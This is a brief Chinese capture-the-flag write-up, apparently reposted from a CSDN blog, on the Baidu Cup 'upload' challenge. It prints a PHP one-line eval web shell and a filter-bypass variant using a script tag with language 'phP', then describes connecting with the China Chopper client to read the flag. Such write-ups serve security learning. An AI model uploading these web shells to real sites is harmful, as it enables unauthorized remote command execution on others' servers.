cft-wp-百度杯CTF比赛 九月场(upload)

打开连接 发现有个上传功能:
在这里插入图片描述
上传一句话试试:<?php @eval($_POST['pass']);?>
发现没有路径,看下源码:
在这里插入图片描述
找到路径,上菜刀提示连不上,猜测可能有过滤,或者文件不能被解析,先访问一下看看
在这里插入图片描述
发现<?php 被过滤了。。
翻阅资料找到一种php标记方法,将一句话改为:

<script language="phP"> 
  @eval($_POST["pass"]);
 </script>

上传再试菜刀连接:
在这里插入图片描述
连接成功:找到flag.php
在这里插入图片描述
bingo

猜你喜欢

转载自blog.csdn.net/key_nothing/article/details/82909617